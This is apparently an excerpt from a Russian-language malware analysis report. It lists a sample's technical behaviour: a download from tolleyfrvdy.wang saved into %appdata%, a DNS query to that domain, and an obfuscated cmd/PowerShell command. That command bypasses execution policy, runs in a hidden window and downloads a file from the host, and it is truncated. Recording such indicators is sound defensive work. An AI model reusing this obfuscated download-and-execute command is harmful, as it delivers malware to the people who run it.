Техническая информация
- http://tolleyfrvdy.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWeRSHelL.exE -e^xEC^uTi^O^Npo^lic^Y^ ^B^y^PaSs^ -^N^Opro^f^i^le ^-w^iNdOw^STYLe^ ^H^Id^de^n^ ^(n^eW-^OBje^CT SyS^TEm^.^ne^t^.w^E^b^ClIENt).D^o^W^NLo^a^d^fI^lE('http://tolley...
- DNS ASK to####frvdy.wang
- '<SYSTEM32>\cmd.exe' /c "pOWeRSHelL.exE -e^xEC^uTi^O^Npo^lic^Y^ ^B^y^PaSs^ -^N^Opro^f^i^le ^-w^iNdOw^STYLe^ ^H^Id^de^n^ ^(n^eW-^OBje^CT SyS^TEm^.^ne^t^.w^E^b^ClIENt).D^o^W^NLo^a^d^fI^lE('http://tolley...' (со скрытым окном)